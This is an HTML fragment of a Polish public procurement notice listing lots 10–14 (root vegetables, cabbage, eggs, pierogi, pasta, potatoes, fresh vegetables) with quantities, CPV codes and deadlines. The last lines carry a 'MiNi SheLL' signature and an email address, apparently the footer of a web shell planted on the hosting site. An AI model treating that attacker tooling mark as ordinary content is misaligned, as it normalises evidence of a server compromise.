<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Burak ćwikła 	kg.	350
Cebula  biała	kg.	300
marchew	kg.	400
seler  (korzeń ) 	kg.	30
por 	kg.	50
Pietruszka korzeń 	kg.	15
Kapusta czerwona	kg.	60
Kapusta biała 	kg.	600
Kapusta włoska 	kg.	100
Kapusta pekińska	kg.	200
Kapusta kiszona	kg.	150
Ogórek kwaszony 	kg.	200
Fasola biała 	kg.	100
Groch  łupany   	kg.	20
Czosnek 	kg.	22
Pieczarka 	kg.	80
Szczypior 	Peczk.	220.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.10-1, 15.33.11.40-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> JAJA KURZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze świeże kl. I Szt 8000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> WYROBY  MĄCZNE  GOTOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierogi ruskie  domowe	Kg.	400
Pierogi z kapustą  i pieczarkami	kg.	180 
Naleśniki  z serem 	kg	200
Kopytka świeże 	Kg 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8, 15.85.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> MAKARON.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Makaron świderki  op. Nie mniej jak 1000 g 	szt	150
Makaron gniazda wstążkiop. Nie mniej jak 500g 	Szt .	100 
Makaron  spaghetti  op. 400 g    	Szt.	400
Makaron łazanki  Lubella lub równoważny op. Nie mniej jak 400g Szt.150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZIEMNIAKI JADALNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne późne  op. worek nie mniej jak  30 kg 
Polska Norma - PN-R-74450:1975 Kg	 6500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> WARZYWA ŚWIEŻE SEZONOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> POMIDOR ŚWIEŻY 	kg	 550
OGÓREK ŚWIEZY 	Kg	350
SAŁATA 	Szt	250
PAPRYKA  ŚWIEŻA 	kg	30
KALAFIOR  ŚWIEŻY 	szt 	40
Rzodkiewka 	p.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com